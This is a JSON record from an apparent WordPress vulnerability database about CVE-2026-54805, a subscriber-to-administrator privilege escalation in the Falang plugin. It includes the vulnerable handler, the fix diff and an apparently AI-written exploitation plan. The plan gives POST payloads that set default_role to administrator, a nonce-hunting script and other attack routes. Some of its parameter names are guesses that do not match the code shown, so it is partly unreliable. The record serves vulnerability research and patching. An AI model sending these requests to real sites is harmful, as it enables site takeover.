[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fL9cUZ0_9fMLCuSn5QJJcQvgsgQfjoyJNxCcGAyOthvM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-54805","falang-multilanguage-for-wordpress-authenticated-subscriber-privilege-escalation","Falang multilanguage for WordPress \u003C= 1.4.2 - Authenticated (Subscriber+) Privilege Escalation","The Falang multilanguage for WordPress plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.4.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges.","falang",null,"\u003C=1.4.2","1.4.3","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Incorrect Privilege Assignment","2026-06-16 00:00:00","2026-06-25 14:03:45",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbf11aed9-8782-4579-95a5-e88b19641ae8?source=api-prod",10,[22,23,24,25,26],"README.txt","admin\u002Fclass-falang-admin.php","admin\u002Fviews\u002Ffalang_option_translation_page.php","buid.xml","falang.php","researched",false,3,"This research plan targets **CVE-2026-54805**, a privilege escalation vulnerability in the **Falang** plugin for WordPress. The vulnerability arises from an unprotected AJAX endpoint that allows any authenticated user (including Subscribers) to modify WordPress options, potentially leading to full site takeover.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Incorrect Privilege Assignment (Privilege Escalation)\n*   **Location:** `admin\u002Fclass-falang-admin.php`\n*   **Cause:** The plugin registers multiple AJAX handlers (e.g., `falang_set_option_translation`) using `add_action('wp_ajax_...')` without implementing any capability checks (like `current_user_can('manage_options')`) within the handler functions.\n*   **Impact:** A Subscriber-level user can call these actions to update arbitrary WordPress options, such as changing the `default_role` to `administrator` or enabling `users_can_register`.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `falang_set_option_translation` (registered in `Falang_Admin::load()`)\n*   **Payload Parameter:** `option_name` and `option_value` (or `translation`).\n*   **Authentication:** Subscriber level or higher.\n*   **Preconditions:** The plugin must be active. No specific settings are required, though the vulnerability involves the \"Options Translation\" feature.\n\n### 3. Code Flow\n1.  **Entry Point:** An authenticated user sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with `action=falang_set_option_translation`.\n2.  **Hook Registration:** In `admin\u002Fclass-falang-admin.php`, the `load()` function registers:\n    ```php\n    add_action('wp_ajax_falang_set_option_translation', array($this, 'ajax_set_option_translation'));\n    ```\n3.  **Handler Execution:** The `ajax_set_option_translation` function (located in `admin\u002Fclass-falang-admin.php`, likely truncated in the snippet) receives the POST parameters.\n4.  **Vulnerable Sink:** The function likely calls `update_option()` or a model method that modifies the `wp_options` table based on the `option_name` and `option_value` parameters without verifying the user's administrative privileges.\n\n### 4. Nonce Acquisition Strategy\nBased on `admin\u002Fviews\u002Ffalang_option_translation_page.php`, the plugin uses AJAX for option translation but doesn't clearly show a nonce being localized in the provided snippets. However, standard WordPress security practices suggest checking for one.\n\n**Steps to find the nonce:**\n1.  **Check for Global Nonce:** Login as a Subscriber and visit `wp-admin\u002Fprofile.php`.\n2.  **Execute Discovery:** Use `browser_eval` to search for localized Falang data:\n    ```javascript\n    browser_eval(\"window.falang || window.falang_ajax || document.body.innerHTML.match(\u002F[a-f0-9]{10}\u002Fg)\")\n    ```\n3.  **Specific Variable:** Look for a variable like `falang.nonce` or `falang_ajax_nonce`.\n4.  **If No Nonce Found:** Attempt the exploit without a nonce, as many \"Incorrect Privilege Assignment\" vulnerabilities also involve missing nonce checks.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Privilege Escalation via `default_role`\nThis attempt aims to change the default role for new users to `administrator`.\n\n*   **Tool:** `http_request`\n*   **Method:** POST\n*   **URL:** `https:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=falang_set_option_translation&option_name=default_role&option_value=administrator\n    ```\n    *(Note: If a nonce is found in Step 4, add `&nonce=[NONCE_VALUE]` or `&_wpnonce=[NONCE_VALUE]`)*\n\n#### Step 2: Enable Open Registration\nTo ensure the attacker can create a new account easily.\n\n*   **Body:**\n    ```\n    action=falang_set_option_translation&option_name=users_can_register&option_value=1\n    ```\n\n### 6. Test Data Setup\n1.  **Install Falang:** Ensure Falang version 1.4.2 is installed.\n2.  **Create Subscriber:**\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password123\n    ```\n3.  **Verify Initial State:**\n    ```bash\n    wp option get default_role  # Should be 'subscriber'\n    wp option get users_can_register # Should be '0'\n    ```\n\n### 7. Expected Results\n*   **Response:** A JSON response, likely `{\"success\":true}`.\n*   **System State:** The `default_role` option in the database should be updated to `administrator`.\n\n### 8. Verification Steps\nAfter sending the HTTP requests, verify using WP-CLI:\n```bash\n# Check if the default role was changed\nwp option get default_role\n\n# Check if registration was enabled\nwp option get users_can_register\n\n# (Optional) Create a new user to confirm they become an admin\nwp user create new_admin new_admin@example.com\nwp user get new_admin --field=roles # Should return 'administrator'\n```\n\n### 9. Alternative Approaches\nIf `falang_set_option_translation` does not directly update the option:\n*   **Target `update_settings_post_options`:** Try `action=update_settings_post_options` with parameters discovered by auditing the truncated `ajax_update_settings_post_options` function.\n*   **Data Leakage:** Use `action=falang_export_options&option_name=wp_user_roles` to leak the site's role structure, which might reveal other sensitive options to target.\n*   **Typos exploitation:** The hook `wp_ajax_falang_option_update_translation` is mapped to `ajax_update_term_translation` in the source. This mismatch often indicates logic errors where parameters for \"terms\" are applied to \"options,\" potentially allowing for database corruption or specific option overwrites.","The Falang multilanguage plugin for WordPress is vulnerable to privilege escalation because it lacks capability checks and nonce validation in its AJAX handler `ajax_set_option_translation`. This allows authenticated users with subscriber-level permissions to modify arbitrary WordPress options, such as changing the default registration role to administrator.","\u002F\u002F admin\u002Fclass-falang-admin.php (Line 950 approx)\n    public function ajax_set_option_translation()\n    {\n\n        if (isset($_POST['falang_option_translation'])) {\n\n            $option_tree = $this->map_deep($_POST['falang_option_translation'], array($this, 'format_option'));\n\n            $this->update_option_translations($option_tree);\n\n            $response = new stdClass();\n            $response->success = 'option updated';\n            $response->option = $option_tree;\n            $this->return_json($response);\n\n        }\n\n        wp_die();\n\n    }","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffalang\u002F1.4.2\u002Fadmin\u002Fclass-falang-admin.php\t2026-05-07 12:10:52.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffalang\u002F1.4.3\u002Fadmin\u002Fclass-falang-admin.php\t2026-05-18 09:01:00.000000000 +0000\n@@ -945,26 +945,30 @@\n      * Set option translation for ajax\n      *\n      * @from 1.5\n-     * @since 1.3.7 add update message on option translation\n+     * @update 1.3.7 add update message on option translation\n+     * @update 1.4.3 fix security (add capability check) , and check ajax\n      *\u002F\n     public function ajax_set_option_translation()\n     {\n+        check_ajax_referer( 'falang_action', '_nonce' );\n \n-        if (isset($_POST['falang_option_translation'])) {\n+        if (current_user_can('manage_options')) {\n \n-            $option_tree = $this->map_deep($_POST['falang_option_translation'], array($this, 'format_option'));\n+            if (isset($_POST['falang_option_translation'])) {\n \n-            $this->update_option_translations($option_tree);\n+                $option_tree = $this->map_deep($_POST['falang_option_translation'], array($this, 'format_option'));\n \n-            $response = new stdClass();\n-            $response->success = 'option updated';\n-            $response->option = $option_tree;\n-            $this->return_json($response);\n+                $this->update_option_translations($option_tree);\n \n-        }\n+                $response = new stdClass();\n+                $response->success = 'option updated';\n+                $response->option = $option_tree;\n+                $this->return_json($response);\n \n+            }\n+            \u002F\u002Fdie\n+        }\n         wp_die();\n-\n     }","To exploit this vulnerability, an attacker first authenticates to the WordPress site with a low-privileged account (e.g., Subscriber). They then send a POST request to the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint with the parameter `action=falang_set_option_translation`. The payload includes a `falang_option_translation` array containing a key-value pair where the key is a sensitive WordPress option (like `default_role`) and the value is the desired setting (like `administrator`). Since the plugin does not verify the user's capabilities or check for a valid security nonce in versions up to 1.4.2, the application updates the specified option, granting the attacker or new users administrative privileges.","gemini-3-flash-preview","2026-06-25 23:14:47","2026-06-25 23:16:18",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","1.4.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffalang\u002Ftags\u002F1.4.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffalang.1.4.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffalang\u002Ftags\u002F1.4.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffalang.1.4.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffalang\u002Ftags"]